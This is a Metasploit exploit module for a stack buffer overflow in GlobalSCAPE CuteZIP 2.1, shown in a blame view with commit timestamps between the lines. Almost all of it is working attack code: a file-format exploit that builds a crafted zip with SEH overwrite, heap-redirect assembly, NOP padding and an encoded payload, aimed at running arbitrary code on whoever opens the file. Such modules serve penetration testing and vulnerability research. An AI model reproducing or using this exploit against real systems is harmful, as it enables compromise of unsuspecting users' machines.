2012-08-14 16:15:29 +00:00
|
|
|
##
|
2013-10-15 18:50:46 +00:00
|
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2012-08-14 16:15:29 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
require 'rex/zip'
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2013-08-30 21:28:54 +00:00
|
|
|
Rank = NormalRanking
|
2012-08-14 16:15:29 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::FILEFORMAT
|
|
|
|
|
include Msf::Exploit::Remote::Seh
|
2012-08-14 16:15:29 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
|
super(update_info(info,
|
|
|
|
|
'Name' => 'GlobalSCAPE CuteZIP Stack Buffer Overflow',
|
|
|
|
|
'Description' => %q{
|
|
|
|
|
This module exploits a stack-based buffer overflow vulnerability in version 2.1
|
|
|
|
|
of CuteZIP.
|
2012-08-14 16:15:29 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
In order for the command to be executed, an attacker must convince the target user
|
|
|
|
|
to open a specially crafted zip file with CuteZIP. By doing so, an attacker can
|
|
|
|
|
execute arbitrary code as the target user.
|
|
|
|
|
},
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'Author' =>
|
|
|
|
|
[
|
|
|
|
|
'C4SS!0 G0M3S <Louredo_[at]hotmail.com>', # Initial discovery, poc
|
|
|
|
|
'juan vazquez' # Metasploit
|
|
|
|
|
],
|
|
|
|
|
'References' =>
|
|
|
|
|
[
|
|
|
|
|
[ 'OSVDB', '85709' ],
|
|
|
|
|
[ 'EDB', '16162' ],
|
|
|
|
|
[ 'BID', '46375' ]
|
|
|
|
|
],
|
|
|
|
|
'Platform' => [ 'win' ],
|
|
|
|
|
'Payload' =>
|
|
|
|
|
{
|
|
|
|
|
'BadChars' => "",
|
|
|
|
|
'DisableNops' => true,
|
|
|
|
|
'Space' => 3000 # Limit due to the heap chunk size where the payload is stored
|
|
|
|
|
},
|
|
|
|
|
'Targets' =>
|
|
|
|
|
[
|
|
|
|
|
[
|
|
|
|
|
# Tested successfully on:
|
|
|
|
|
# * Windows XP SP3
|
|
|
|
|
# * Windows Vista SP2
|
|
|
|
|
# * Windows 7 SP1
|
|
|
|
|
# (NO DEP)
|
|
|
|
|
'CuteZIP 2.1 / Windows Universal',
|
|
|
|
|
{
|
|
|
|
|
'Ret' => 0x0040112F, # pop, pop, ret from CuteZIP.exe
|
|
|
|
|
'Offset' => 1148,
|
|
|
|
|
'Nops' => 398
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
],
|
|
|
|
|
'DisclosureDate' => 'Feb 12 2011',
|
|
|
|
|
'DefaultTarget' => 0))
|
2012-08-14 16:15:29 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
register_options(
|
|
|
|
|
[
|
|
|
|
|
OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip'])
|
|
|
|
|
], self.class)
|
2012-08-14 16:15:29 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2012-08-14 16:15:29 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def exploit
|
2012-08-14 16:15:29 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
redirect_heap = <<-ASM
|
|
|
|
|
popad
|
|
|
|
|
popad
|
|
|
|
|
popad
|
|
|
|
|
push ecx
|
|
|
|
|
pop eax
|
|
|
|
|
call eax
|
|
|
|
|
ASM
|
2012-08-14 16:15:29 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
crafted_file = rand_text(target['Offset'])
|
|
|
|
|
crafted_file << generate_seh_record(target.ret)
|
|
|
|
|
crafted_file << Metasm::Shellcode.assemble(Metasm::Ia32.new, redirect_heap).encode_string
|
|
|
|
|
crafted_file << make_nops(1) * target['Nops']
|
|
|
|
|
crafted_file << payload.encoded
|
2012-08-14 16:15:29 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Create the file
|
|
|
|
|
zip = Rex::Zip::Archive.new
|
|
|
|
|
xtra = rand_text(4)
|
|
|
|
|
zip.add_file(crafted_file, xtra)
|
2012-08-14 16:15:29 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
print_status("Creating '#{datastore['FILENAME']}' file...")
|
|
|
|
|
file_create(zip.pack)
|
|
|
|
|
end
|
2012-08-14 16:15:29 +00:00
|
|
|
|
|
|
|
|
end
|
